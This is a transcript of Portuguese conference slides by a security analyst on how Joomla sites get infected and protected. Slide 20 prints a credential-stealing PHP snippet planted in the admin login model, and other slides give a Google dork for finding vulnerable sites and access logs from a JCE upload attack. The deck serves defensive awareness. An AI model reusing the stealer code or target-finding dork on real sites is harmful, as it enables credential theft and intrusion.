Analise de Infeccoes no Joomla - JDBR14

Transcript

1. Análise de Infecções em Joomla Bruno Borges, CEH, Security Analyst

   @ Sucuri.net #JDBR14 @brunoborgessec
2. None

3. O Joomla costuma ser hackeado? #JDBR14 :: @brunoborgessec

4. SIM ! Má notícia: #JDBR14 :: @brunoborgessec

5. A maior parte das infecções são em Joomla 1.5.x Boa

   notícia: Ufa! Afinal de contas, todos usamos a versão 3.2, 3.3 … Será? o.O #JDBR14 :: @brunoborgessec (Não quer dizer que 2.x e 3.x sejam amplamente seguras)

6. Se você usa Joomla 1.5.x puro: •  Você já foi

   hackeado •  Você será hackeado •  Você está sendo hackeado #JDBR14 :: @brunoborgessec

7. Histórico de Releases do Joomla #JDBR14 :: @brunoborgessec

8. Histórico de Releases do Joomla #JDBR14 :: @brunoborgessec

9. Histórico de Releases do Joomla #JDBR14 :: @brunoborgessec

10. Histórico de Releases do Joomla #JDBR14 :: @brunoborgessec

11. Tipos de Vulnerabilidades #JDBR14 :: @brunoborgessec Fonte: http://www.cvedetails.com/vendor/3496/Joomla.html

12. Vulnerabilidades através dos anos #JDBR14 :: @brunoborgessec Fonte: http://www.cvedetails.com/vendor/3496/Joomla.html

13. Ataques ao Joomla #JDBR14 :: @brunoborgessec

14. Vetores de Ataque #JDBR14 :: @brunoborgessec

15. Processo dos ataques atuais 1) Encontrar vulnerabilidade: seclists.org/fulldisclosure exploit-db.com cve.mitre.org

    web.nvd.nist.gov

16. Processo dos ataques atuais 2) Encontrar alvo Google Dork: inurl:index.php?option=com_collector

    shodanhq.com #JDBR14 :: @brunoborgessec

17. Processo dos ataques atuais 3) Ataque! #JDBR14 :: @brunoborgessec

18. Ameaças / Vulnerabilidades Recentes #JDBR14 :: @brunoborgessec

19. Ameaças / Vulnerabilidades Recentes Qualquer versão < 3.1.0.4 RCE ->

    Remote Code Execution: Vulnerabilidade que pode permitir a um invasor executar código arbitrário e assumir o controle do sistema afetado Joomla JomSocial: Remote Code Execution #JDBR14 :: @brunoborgessec Fonte: http://blog.sucuri.net/2014/02/joomla-jomsocial-remote-code-execution-vulnerability.html

20. Ameaças / Vulnerabilidades Recentes Joomla Password Stealer Arquivo infectado: /administrator/components/com_login/models/login.php

    $fh = fopen("components/com_login/models/login.txt", 'a'); date_default_timezone_set("America/Chicago"); fwrite($fh,date('m/d/Y H:i:s', time())." $_SERVER[REMOTE_ADDR] [$credentials[username]:$credentials[password]]\n"); fclose($fh); #JDBR14 :: @brunoborgessec http://labs.sucuri.net/?note=2013-11-21

21. Ameaças / Vulnerabilidades Recentes Backdoor de todos os dias #JDBR14

    :: @brunoborgessec

22. Ameaças / Vulnerabilidades Recentes JPG EXIF Headers #JDBR14 :: @brunoborgessec

    http://blog.sucuri.net/2013/07/malware-hidden-inside-jpg-exif-headers.html

23. Ameaças / Vulnerabilidades Recentes JPG EXIF Headers #JDBR14 :: @brunoborgessec

    http://blog.sucuri.net/2013/07/malware-hidden-inside-jpg-exif-headers.html

24. Ameaças / Vulnerabilidades Recentes JCE Remote File Upload 197.205.70.37 -

    - [23/Jan/2014:16:46:54 -0500] "POST /index.php? option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c124 6b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.0" 200 302 "-" "BOT/0.1 (BOT for JCE)" 197.205.70.37 - - [23/Jan/2014:16:46:55 -0500] "POST /index.php? option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20 HTTP/1.0" 200 329 "-" "BOT/0.1 (BOT for JCE)” http://blog.sucuri.net/2014/03/jce-joomla-extension-attacks-in-the-wild.html

25. Proteções #JDBR14 :: @brunoborgessec

26. Proteções Bloquear PHP onde não deve ter <Files *.php> deny

    from all </Files> Ex: /images/stories #JDBR14 :: @brunoborgessec

27. Proteções Patching x Virtual Patching Patching: Atualizar para corrigir vulnerabilidades

    existentes. Virtual Patching: Soluções de produtos que permitem a proteção de vulnerabilidades existentes quando não for possível aplicar o patch. Ex: Joomla 1.5.x #JDBR14 :: @brunoborgessec

28. Proteções Web Application Firewall / Website Firewall •  A forma

    mais rápida de proteger o seu site. •  Requer pouco esforço. •  Necessário pouco conhecimento de Segurança #JDBR14 :: @brunoborgessec

29. Proteções Verifique se seu site está limpo: sitecheck.sucuri.net #JDBR14 ::

    @brunoborgessec

30. Considerações Finais #JDBR14 :: @brunoborgessec

31. Considerações Finais #JDBR14 :: @brunoborgessec

32. Considerações Finais #JDBR14 :: @brunoborgessec

33. Considerações Finais #JDBR14 :: @brunoborgessec

34. Considerações Finais #JDBR14 :: @brunoborgessec

35. Considerações Finais #JDBR14 :: @brunoborgessec

36. Considerações Finais #JDBR14 :: @brunoborgessec

37. Dúvidas #JDBR14 :: @brunoborgessec

38. OBRIGADO! @brunoborgessec /in/brunoaborges [email protected] bbsec.net / sucuri.net #JDBR14 :: @brunoborgessec